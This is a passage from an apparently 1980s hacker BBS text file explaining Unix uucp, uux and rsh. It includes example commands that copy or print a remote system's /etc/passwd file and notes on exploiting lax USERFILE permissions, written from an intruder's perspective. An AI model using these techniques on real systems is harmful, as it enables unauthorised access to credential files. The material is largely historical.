  2324. If the system you wish to transfer files with doesn't send anything when you 
  2325. first connect to it, (say, you have to press return first), the first expect 
  2326. entry should be "" (nothing), and the first send field should be \r (a return 
  2327. character). There are certain characters, like return, which are represented by 
  2328. certain symbols or combinations of characters. Here is a list of these:
  2329.  
  2330. \r              -Return.
  2331. @               -Kill.
  2332. -               -Null/newline character.
  2333. ""              -Nothing.
  2334.  
  2335. UNUSUAL LOGIN ENTRIES
  2336. ---------------------
  2337.         Sometimes, the login entry for a system might contain more than just 
  2338. fields to expect the login prompt, send the username, expect the password 
  2339. prompt, and send the password. For instance, if you have to go through a 
  2340. multiplexer to get to the system, the login field would contain a subfield to 
  2341. select the proper system from the multiplexer.
  2342.         Sometimes, on systems, that use the Hayes smartmodem to dial out, the 
  2343. phone number field may be left unused (will contain an arbitrary entry, such as 
  2344. the word "UNUSED"), and the dialing command will be contained in the login 
  2345. field. For example:
  2346.  
  2347. ripco  Any ACU 1200 UNUSED  "" ATDT13125285020 CONNECT \r ernumber: new
  2348.  
  2349. So, when you try to transfer a file with a Unix system called "ripco":
  2350. "UNUSED" is sent to the Hayes smartmodem. Of course, this is not a valid Hayes 
  2351. command, so it is ignored by the modem. Next, the system moves the login field. 
  2352. The first expect subfield is "", which means to expect nothing. It then sends 
  2353. the string "ATDT13125285020", which is a Hayes dialing comand, which will make 
  2354. the modem dial 13125285020. When the string "CONNECT" is received (which is 
  2355. what the smartmodem will respond with when it connects), the system sends a 
  2356. carriage return and waits for the "Usernumber:" prompt. When it receives that, 
  2357. it sends "new". This completes the login.
  2358.  
  2359. UUCP SYNTAX
  2360. -----------
  2361.         Once you've completed an entry for the Unix system you wish to transfer 
  2362. files with, you can issue the uucp command, and attempt the transfer. The 
  2363. syntax to copy a file from the remote system is:
  2364.  
  2365. uucp remote![file pathname] [local pathname]
  2366.  
  2367. Where remote is the name of the system you wish to copy the file from, [file 
  2368. pathname] is the pathname of the file you wish to copy, and [local pathname] is 
  2369. the pathname of the file on the local system that you wish to name the copy 
  2370. that is made on the local system.
  2371. To transfer a file from the local system to the remote system, the syntax is:
  2372.  
  2373. uucp [local pathname] remote![file pathname]
  2374.  
  2375. Where [local pathname] is the file on the local system that you wish to 
  2376. transfer to the remote system, remote is the name of the remote system, and 
  2377. [file pathname] is the pathname you wish to give to the copy to be made on the 
  2378. remote system. 
  2379.  
  2380. So, to copy the ripco system's password file, type:
  2381.  
  2382. uucp ripco!/etc/passwd /usr/spool/uucppublic/ripcofile
  2383.  
  2384. Which will, hopefully, copy the password file from ripco into a file on the 
  2385. local system called /usr/spool/uucppublic/ripcofile. The directory 
  2386. /usr/spool/uucppublic is a directory set up especially for the reception of 
  2387. uucp-transferred files, although you can have the file copied to any directory 
  2388. (if the directory permissions don't prevent it).
  2389.  
  2390. DEBUGGING UUCP PROCEDURES
  2391. -------------------------
  2392.         So, what if your transfer did not go through? Well, this section will 
  2393. detail how to find out what went wrong, and how to correct the situation.
  2394.  
  2395. UULOG
  2396. -----
  2397.         The uulog command is used to draw up a log of transactions with remote 
  2398. systems. You can either draw up the entries by system name, or the name of the 
  2399. user who initiated the transaction.
  2400. For our purposes, we only want to draw up the log by system name. The format 
  2401. is:
  2402.  
  2403. uulog -s[system name]
  2404.  
  2405. Now, this will pull up the logs for ALL transactions with this particular 
  2406. system. We only want the logs for the last attempted transaction with the 
  2407. system. Unfortunately, this can't be done, you'll just have to sort through the 
  2408. logs until you reach the sequence of the last transaction. If the logs extend 
  2409. back a long time, say about a week, however, you can use the grep command to 
  2410. call up the logs only for a certain date:
  2411.  
  2412. uulog -s[system] | grep mm/dd-
  2413.  
  2414. Where mm is the month (in the form ##, such as 12 or 01) and dd is the day, in 
  2415. the same form). This takes the output of the uulog command, and searches 
  2416. through it with the grep command and only prints out those entries which 
  2417. contain the date the grep command is searching for. The log entries will be in 
  2418. the form:
  2419.  
  2420. [username] [system] (month/day-hour:minute-pid) DESCRIPTION
  2421.  
  2422. Where:
  2423.  
  2424. username        -Is the userid of the account that initiated the transaction.
  2425. system          -Is the name of the system that the transaction was attempted
  2426.                 with.
  2427. month/day       -Date of transaction.
  2428. hour:minute     -Time of transaction.
  2429. job number      -The transfer's process id.
  2430. DESCRIPTION     -The log message.
  2431.  
  2432. An example of a typical log entry:
  2433.  
  2434. root ripco (11/20-2:00-1234) SUCCEEDED (call to ripco)
  2435.  
  2436. In the above example, the root account initiated a transaction with the Ripco 
  2437. system. The system was contacted on November 20, at 2:00. The job number of the 
  2438. transaction is 1234.
  2439.  
  2440. Here is an explanation of the various log messages you will encounter, and 
  2441. their causes:
  2442.  
  2443. 1. SUCCEEDED (call to [system name])
  2444.  
  2445. The system was successfully contacted.
  2446.  
  2447. 2. DIAL FAILED (call to [system name])
  2448.  
  2449. Uucp failed to contact the system. The phone number entry for the system in the 
  2450. Systems file may be wrong, or in the wrong format.
  2451.  
  2452. 3. OK (startup)
  2453.  
  2454. Conversation with the remote system has been initiated.
  2455.  
  2456. 4. LOGIN FAILED
  2457.  
  2458. Uucp was unable to log into the remote system. There may be an error in the 
  2459. login field in the entry for the remote system in the Systems file, or line 
  2460. noise may have caused the login to fail.
  2461.  
  2462. 5. WRONG SYSTEM NAME
  2463.  
  2464. The system's entry in the Systems file has the wrong name for the system at the 
  2465. phone number specified in the entry.
  2466.  
  2467. 6. REMOTE DOES NOT KNOW ME
  2468.  
  2469. The remote system does not recognize the name of the local system, and will not 
  2470. perform transactions with an unknown system (some will, some won't...see the 
  2471. section on uucp security).
  2472.  
  2473. 7. REQUEST ([remote file] --> [local file] username)
  2474.  
  2475. The file transfer has been requested.
  2476.  
  2477. 8. OK (conversation complete)
  2478.  
  2479. The transfer has been completed.
  2480.  
  2481. 9. ACCESS DENIED
  2482.  
  2483. Security measures prevented the file transfers.
  2484. If you get this error, you will receive mail on the local system informing you 
  2485. that the transfer was denied by the remote.
  2486.  
  2487. 10. DEVICE LOCKED
  2488.  
  2489. All the dialout devices were currently in use.
  2490.  
  2491.  
  2492.  
  2493. A successful transaction log will usually look like this:
  2494.  
  2495. root ripco (11/20-2:00-1234) SUCCEEDED (call to ripco)
  2496. root ripco (11/20-2:01-1234) OK (startup)
  2497. root ripco (11/20-2:01-1234) REQUEST (ripco!/etc/passwd --> /ripcofile root)
  2498. root ripco (11/20-2:03 1234) OK (conversation complete)
  2499.  
  2500.         When an error occurs during a transfer with a system, a status file is 
  2501. created for that system, and remains for a set period of time, usually about an 
  2502. hour. During this time, that system cannot be contacted. These files, depending 
  2503. on which version of Unix you are on, will either be in the directory 
  2504. /usr/spool/uucp, and have the form:
  2505. STST..[system name]
  2506. or will be in the directory /usr/spool/uucp/.Status, and have the same name as 
  2507. the system. These status files will contain the reason that the last transfer 
  2508. attempt with the system failed. These files are periodically purged, and if you 
  2509. wish to contact the system before its status file is purged, you must delete 
  2510. its status file.
  2511. The files containing the failed transfer request will also remain. If you are
  2512. using the latest version of System V, these files will be in a subdirectory of
  2513. the directory /usr/spool/uucp. For instance, if the system is called ripco, 
  2514. the files will be in the directory /usr/spool/uucp/ripco. On other systems, 
  2515. these files will be in the directory /usr/spool/uucp/C., or /usr/spool/uucp. 
  2516. These files are in the form:
  2517.  
  2518. C.[system name]AAAAAAA
  2519.  
  2520. Where [system name] is the name of the system to be contacted, and AAAAAA is a 
  2521. the transfer's uucp job number. (You can see the transfer request's job number 
  2522. by specifying the j option when you initiate the transfer. For example, 
  2523. "uucp -j ripco!/etc/passwd /usr/spool/uucppublic/ripcofile" would initiate the
  2524. transfer of the ripco system's password file, and display the job number on 
  2525. your screen.) Type "cat C.system[jobnumber]", and you will see something like 
  2526. this:
  2527.  
  2528. R /etc/passwd /usr/pub/.dopeypasswd root -dc dummy 777 guest
  2529.  
  2530. On earlier versions of Unix, these files will be in the directory 
  2531. /usr/spool/uucp/C. To find the file containing your transfer, display the 
  2532. contents of the files until you find the proper one. If your transfer fails, 
  2533. delete the transfer request file and the status file, correct any errors in the 
  2534. Systems file or whatever, and try again!
  2535.  
  2536. UUCP SECURITY
  2537. -------------
  2538.         Obviously, uucp access to files has to be restricted. Otherwise, 
  2539. anyone, from any system, could copy any file from the remote system. This 
  2540. section will cover the security features of the uucp facilities.
  2541.         The file /usr/lib/uucp/USERFILE contains a list of the directories that 
  2542. remote systems can copy from, and local users can send files from to remote 
  2543. systems. The entries in this file are in the format:
  2544.  
  2545. [local user],[system] [callback?] [directories]
  2546.  
  2547. Where:
  2548.  
  2549. local user      -Is the username of a local account. This is for the purpose
  2550.                 of restricting which directories a local user can send files
  2551.                 from to a remote system. 
  2552. system          -Is the name of a remote system. This is for the purpose of 
  2553.                 restricting which directories a specific remote system can
  2554.                 copy files from.
  2555. callback?       -If there is a c in this field, then if a transfer request is
  2556.                 received from the system indicated in the system field, then
  2557.                 the local system (in this case, the local system is the system
  2558.                 which receives the transfer request, rather than the system
  2559.                 that initiated it) will hang up and call the remote back (at
  2560.                 the number indicated in the remote's entry in the local's
  2561.                 Systems file) before starting the transfer.
  2562. directories     -Is a list of the pathnames of the directories that the remote
  2563.                 system indicated in the system field can copy files from, or
  2564.                 the local user indicated in the local user field can send files
  2565.                 from to a remote system.
  2566.  
  2567. A typical entry might look like:
  2568.  
  2569. local_dork,ripco - /usr/spool/uucppublic
  2570.  
  2571. This means that the user local_dork can only send files to a remote system 
  2572. which are in the directory /usr/spool/uucppublic, and the remote system ripco 
  2573. can only copy files from the local system that are in the directory 
  2574. /usr/spool/uucppublic. This is typical: often, remotes are only allowed to copy 
  2575. files in that directory, and if they wish to copy a file from another portion 
  2576. of the system, they must notify a user on the system to move that file to the 
  2577. uucppublic directory. When a transfer request is received from a remote system, 
  2578. the local system scans through the userfile, ignoring the local user field (you 
  2579. can't restrict transfers with a particular user from a remote system...the copy 
  2580. access granted to a system in the USERFILE is granted to all users from that 
  2581. system), until it finds the entry for that system, and if the system is allowed 
  2582. to copy to or from that directory, the transfer is allowed, otherwise it is 
  2583. refused. If an entry for that system is not found, the USERFILE is scanned 
  2584. until an entry with a null system name (in other words, an entry with no system 
  2585. name specified) is found, and the directory permissions for that entry are 
  2586. used. If no entry is found with a null system name, the transfer is denied.
  2587. There are a few quirks about USERFILE entries. First, if you have copy access 
  2588. to a directory, you also have copy access to any directories below it in the 
  2589. system tree. Thus, lazy system operators, rather than carefully limiting a 
  2590. system's access to only the directories it needs access to, often just give 
  2591. them copy access to the root directory, thus giving them copy access to the 
  2592. entire system tree. Yet another mistake made by careless superusers is leaving 
  2593. the system name field empty in the entries for the local users. Thus, if a 
  2594. system that doesn't have an entry in the USERFILE requests a transfer with the 
  2595. local system, when the USERFILE is scanned for an entry with a null system 
  2596. name, if the entries for the local users come first in the USERFILE, the system 
  2597. will use the first entry for a local user it finds, since it has a null system 
  2598. name in the system name field. Note, that none of these security features even 
  2599. works if the uucp account on the system the transfer is requested with does not 
  2600. use the uucico shell. In any case, whether the account uses the uucico shell or 
  2601. not, even if you have copy access to a directory, individual file or directory 
  2602. protections may prevent the copying. For information on uucp security in yet 
  2603. another version of the uucp facilities, see the piece on the Permissions file 
  2604. in the section on uux security.
  2605.  
  2606. EXECUTING COMMANDS ON A REMOTE SYSTEM
  2607. -------------------------------------
  2608.         There are 2 commands for executing commands on a remote system- uux and 
  2609. rsh (remote shell- this has nothing to do with the rsh shell [restricted Bourne 
  2610. shell]). This section will cover the uses of both.
  2611.  
  2612. UUX
  2613. ---
  2614.         The uux command is one of the uucp utilities. This is used, not for 
  2615. file transfers, but for executing non-interactive commands on a remote system. 
  2616. By non-interactive, I mean commands that don't request input from the user, but 
  2617. are executed immediately when issued, such as rm and cp. The format is:
  2618.  
  2619. uux remote!command line
  2620.  
  2621. Where remote is the name of the remote system to perform the command on, and 
  2622. the rest (command line) is the command to be performed, and any arguments to 
  2623. the command. You will not receive any of the commnand's output, so this command 
  2624. can't be used for, say, printing the contents of a text file to your screen.
  2625.  
  2626. UUX SECURITY
  2627. ------------
  2628.         If the uucp account on the remote system uses the uucico shell, then 
  2629. these security features apply to it.
  2630.  
  2631.         The file /usr/lib/uucp/Commands file contains a list of the commands a 
  2632. remote system can execute on the system. By remote system, in this case, I mean 
  2633. the system that the user who initiates the uux command is on, and local system 
  2634. will mean the system that receives the uux request. Entries in the file 
  2635. /usr/lib/uucp/Commands are in the following format:
  2636.  
  2637. PATH=[pathname]
  2638. command
  2639. command
  2640.   " to infinity...
  2641. command,system
  2642.  
  2643. The first line, PATH=[pathname], sets the searchpath for the remote system 
  2644. requesting the uux execution of a command on the local system. This entry is 
  2645. just the same as, say, a line in a login file that sets the searchpath for a 
  2646. regular account, example: PATH=/bin:/usr/bin
  2647. Which sets the searchpath to search first the directory /bin, and the the 
  2648. directory /usr/bin when a command is issued. The following entries are the base 
  2649. names of the programs/commands that the remote can execute on the local system. 
  2650. The last program/command in this list is followed by a comma and the name of 
  2651. the remote site. For example:
  2652.  
  2653. PATH=/bin
  2654. rmail
  2655. lp,ripco
  2656.  
  2657. Means that the remote system Ripco can execute the rmail and lp commands on the 
  2658. local system. Usually, only the lp and rmail commands will be allowed.
  2659.         Again, we come to another, "different" version of the uucp facilities. 
  2660. On some systems, the commands a remote system can execute on the local system 
  2661. are contained in the file /usr/lib/uucp/Permissions. Entries in this file are 
  2662. in the form:
  2663.  
  2664. MACHINE=[remote] COMMANDS=[commands] REQUEST=[yes/no] SEND=[yes/no] READ=
  2665. [directories] WRITE=[directories]
  2666.  
  2667. Where:
  2668.  
  2669. Remote is the name of the remote system. Commands is a list of the commands 
  2670. the remote may execute on the local system, in the form:
  2671. pathname:pathname
  2672.  
  2673. For example:
  2674.  
  2675. /bin/rmail:/usr/bin/netnews
  2676.  
  2677. The yes (or no) aft er "REQUEST=" tells whether or not the remote can copy 
  2678. files from the local system. The yes/no after "SEND=" tells whether or not the 
  2679. remote system can send files to the local system. The list of directories after 
  2680. "READ=" tells which directories the remote can copy files from (provided that 
  2681. it has REQUEST privileges), and is in the form:
  2682.  
  2683. pathname:pathname...etc.
  2684.  
  2685. For example:
  2686.  
  2687. /usr/spool/uucppublic:/usr/lib/uucp
  2688.  
  2689. Again, as before, the remote has copy access to any directories that are below 
  2690. the directories in the list in the system tree. The list of directories after 
  2691. "WRITE=" is in the same form as the list of directories after "READ=", and is a 
  2692. list of the directories that the remote can copy files TO on the local system.
  2693.  
  2694. RSH
  2695. ---
  2696.         This is a new feature which I have seen on a few systems. This is not, 
  2697. to the best of my knowledge, a System V feature, but a package available for 
  2698. 3rd party software vendors. If the rsh command is featured on a system, the 
  2699. restricted (rsh) Bourne shell will be renamed rshell. Rsh stands for remote 
  2700. shell, and is for the execution of any command, interactive or otherwise, on a 
  2701. remote system. The command is executed realtime, and the output from the 
  2702. command will be sent to your display. Any keys you press while this command is 
  2703. being executed will be sent to the remote system, including breaks and 
  2704. interrupts. The format is:
  2705.  
  2706. rsh [system] command line
  2707.  
  2708. For example:
  2709.  
  2710. rsh ripco cat /etc/passwd
  2711.  
  2712. Will print out the /etc/passwd file of the Ripco system on your screen. To the 
  2713. best of my knowledge, the only security features of the rsh command are the 
  2714. individual file and directory protections of the remote system.
  2715.  
  2716. UUNAME AND UUSTAT
  2717. -----------------
  2718.         These are 2 commands which are for use by users to show the state of 
  2719. the local system's uucp facilities. Uuname gives a list of all the system names 
  2720. in the Systems (L.sys) file, and uustat gives a list of all pending uucp/uux 
  2721. jobs.
  2722.  
  2723. NETWORK MAIL
  2724. ------------
  2725.         There are several different ways of sending mail to users on other 
  2726. systems. First of all, using the uucp and uux commands. Simply edit a text file 
  2727. containing the message you wish to send, and uucp a copy of it to the remote 
  2728. system. Then send it to the target user on that system using the uux command:
  2729.  
  2730. uux system!rmail [username] < [pathname]
  2731.  
  2732. Where system is the name of the system the target user is on, username is the 
  2733. name of the user you wish to send the mail to, and pathname is the pathname of 
  2734. the text file you sent to the remote system. This method works by executing the 
  2735. rmail command (Receive Mail), the syntax of which is "rmail [user]", and 
  2736. redirecting its input from the file you sent to the remote. This method will 
  2737. only work if the remote allows users from your local system to execut the rmail 
  2738. command.
  2739.         The second method is for systems which feature the remote shell (rsh) 
  2740. command. If the remote system can be contacted by your local system via rsh, 
  2741. type:
  2742.  
  2743. rsh system!mail [user]
  2744.  
  2745. And once connected, enter your message as normal.
  2746.         This last method is the method of sending mail over uucp networks. This 
  2747. method is the one employed by USENET and other large uucp networks, as well as 
  2748. many smaller and/or private networks. This method uses the simple mail command:
  2749.  
  2750. mail system!system!system![and so on to infinity]!system@user
  2751.  
  2752. Where:
  2753. The list of systems is the routing to the target system, and user is the mail 
  2754. recipient on the target system. The routing takes a bit of explanation. Imagine 
  2755. something a uucp network with connections like this:
  2756.  
  2757.                         unix1
  2758.                           |
  2759.                 -------------------
  2760.                 |                 |
  2761.               unix2             unix3
  2762.                 |                 |
  2763.               unix4-------------unix5
  2764.  
  2765. This network map shows what systems are on the network, and which systems have 
  2766. entries for which other systems in its Systems (L.sys) file. In this example:
  2767.  
  2768. Unix1 has entries for unix2 and unix3.
  2769. Unix2 has entries for unix1 and unix4.
  2770. Unix3 has entries for unix1 and unix5.
  2771. Unix4 has entries for unix2 and unix5.
  2772. Unix5 has entries for unix3 and unix4.
  2773.  
  2774. Now to explain the routing. If unix1 wanted to reach unix5, it couldn't do so 
  2775. directly, since it has no means of reaching it (no entry for it in its Systems 
  2776. file). So, it would "forward" the mail through a series of other systems. For 
  2777. example, to send mail to the user root on unix5, any of these routings could be 
  2778. used:
  2779.  
  2780. unix3!unix5@root
  2781. unix2!unix4!unix5@root
  2782.  
  2783. Obviously, the first routing would be the shortest and quickest. So, to mail a 
  2784. message from unix1 to the root user on unix5, you would type:
  2785.  
  2786. mail unix3!unix5@root
  2787.  
  2788. Then type in your message and press control-D when finished, and the uucp 
  2789. facilities will deliver your mail.
  2790.  
  2791. ACKNOWLEDGEMENTS
  2792. ----------------
  2793.         Well, this is it- the end of the file. I hope you've found it 
  2794. informative and helpful. Before I go on, I'd like to thank a few people whose 
  2795. assistance made writing this file either A: possible or B: easier-
  2796.  
  2797. Shadow Hawke I, for sharing many a Unix account with me.
  2798. The Warrior (of 312), for helping me get started in hacking.
  2799. Omega-- for helping me hack a large network of Unix systems.
  2800. Psychedelic Warlord, for helping me with a BSD Unix system.
  2801. Shooting Shark, for his C decoy, and more than a few good posts on Private 
  2802. Sector.
  2803. Kid&Co, for providing me with some information on the Telnet program.
  2804. And lastly but not leastly, Bellcore, Southern Bell, and BOC's around the 
  2805. country for the use of their systems. Thanks, all!
  2806.  
  2807. -------------
  2808. Corrections:
  2809. I incorrectly listed in one section that chown was the command to change file protections.
  2810. The correct command is chmod.
  2811. Downloaded From P-80 Systems 304-744-2253
  2812.  
  2813.